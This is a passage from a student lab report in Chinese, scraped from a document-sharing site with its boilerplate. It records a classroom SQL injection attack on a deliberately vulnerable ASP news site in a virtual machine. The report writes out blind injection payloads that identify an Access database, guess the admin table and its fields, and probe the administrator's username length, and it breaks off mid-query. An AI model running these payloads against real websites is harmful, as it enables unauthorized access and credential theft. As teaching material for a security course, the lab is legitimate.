- 1、本文档共15页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
- PAGE 1 -
实验报告
(实验名称 :SQL注入攻击)
一、实验目的
通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加强对Web攻击的防范。
二、实验环境
描述实验开展所基于的网络环境,给出网络拓扑、IP地址、web服务器、客户机等信息。
宿主机(客户机):操作系统为Windows 10,IP为1,在主机上安装虚拟化软件 Vmware Player,在此基础上创建虚拟机并安装操作系统,进行网络配置,采用环回适配器,桥接模式,实现宿主机与虚拟机之间的网络通信,
虚拟机(Web服务器):操作系统为Windows XP,IP为,
本实验利用 windows 的 iis 服务搭建了一个有 SQL 注入漏洞的网站“ASP 新闻发 布系统”,以该网站为目标,对其实施 SQL 注入攻击。
本实验所需工具如下:
IIS 是 Internet Information Server 的缩写,是微软提供的 Internet 服务器软 件,包括 Web、FTP、Mail 等服务器,也是目前常用的服务器软件。版本不限。
“啊 D”注入工具:对“MSSQL 显错模式”、“MSSQL 不显错模式”、“Access”等数 据库都有很好的注入检测能力,内集“跨库查询”、“注入点扫描”、“管理入口检测”、 “目录查看”等等于一身的注入工具包。
“ASP 新闻发布系统”Ok3w v4.6 源码。
三、实验内容
(一)配置实验环境,
首先选择网络适配器,安装环回适配器,在主机上安装Vmware Player,成功启动虚拟机。接着配置宿主机和虚拟机的IP,如图
要注意的是,配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge
然后,验证宿主机和虚拟机是否联通,结果显示连接成功。
最后在虚拟机上安装IIS程序,打开浏览器,输入地址“”,检查网站搭建情况。成功!
(二)寻找注入点
在宿主机上,打开网页/list.asp?id=95,可以正常打开页面。
进行注入测试,键入 /list.asp?id=95 and 1=1,返回页面不变。
键入 /list.asp?id=95 and 1=2,返回页面出错。
因此,可确定该网站存在注入点。
(三)判断数据库类型
用系统表的方法进行判断,分别键入
/list.asp?id=95 and (select count(*) from sysobjects)0
/list.asp?id=95 and (select count(*) from msysobjects)0
两者返回均出错,可知是 access 数据库。
(四)猜测表名
一般网站后台的管理员都默认在表 admin 中,我们先试一下,键入:
/list.asp?id=95 and (select count(*) from admin)0
返回页面正常,可知该网站后台数据库中存在着表名为 admin 的表。
(五)猜测字段名不同公司网站有不同的字段名,但一般都有三个字段,分别记录 ID 号、用户名和密码,常用的字段名为:id,username,password。
分别键入 /list.asp?id=95 and (select count(id) from admin)0
/list.asp?id=95 and (select count(username) from admin)0
/list.asp?id=95 and (select count(password) from admin)0
三者返回均正常。 可知,表 admin 中存在的三个字段:id,username,password。
注:“username”的截图损坏,但是返回正常,望教员通融。
(六)猜测管理员用户名和密码
1.确定表 admin 中有几条记录,键入 /list.asp?id=95 and (select count(*) from admin)=1 返回页面正常。
可知,表 admin 只有一条记录。
2.猜测用户名长度,键入 /list.asp?id=95 and (select len(username) from admin)=1 返回出错,继续键入 /list.asp?id=95 and (select len(username) from admin)=2 返回出错,继续测试 3/4/5…,
直到返回页面正确。测试到 5 的时候,返回正常。可知,用户名长度为 5。
3.猜测用户名内容,采用 ASCII 码分析法先猜测第1 位,用二分法,键入 /list.asp?id=95 and (select count(*) from admin whe
您可能关注的文档
最近下载
- 搞笑版原创《雷雨》剧本新编.pdf
- 阿尔茨海默病早期筛查新进展和智能监测技术学习班题库答案-2024华医网继续教育.docx VIP
- 2023北京海淀高一(上)期末物理(附解析).docx
- (完整)交管12123学法减分题库大全(有答案).docx VIP
- 2024年山东省政府采购判断题真题必威体育精装版(2024年12月20日整理)第19套.pdf VIP
- Celestron星特朗CPWI天文望远镜控制软件使用说明书.pdf
- 汽车车载网络及总线技术 教案全套 1.1 车载网络系统认知 ---6.3 MOST总线系统认知.docx
- 中医内科学证型分类与治法方药.doc VIP
- 干洗店的服务质量管理.docx VIP
- 交管12123学法减分题库.doc VIP
文档评论(0)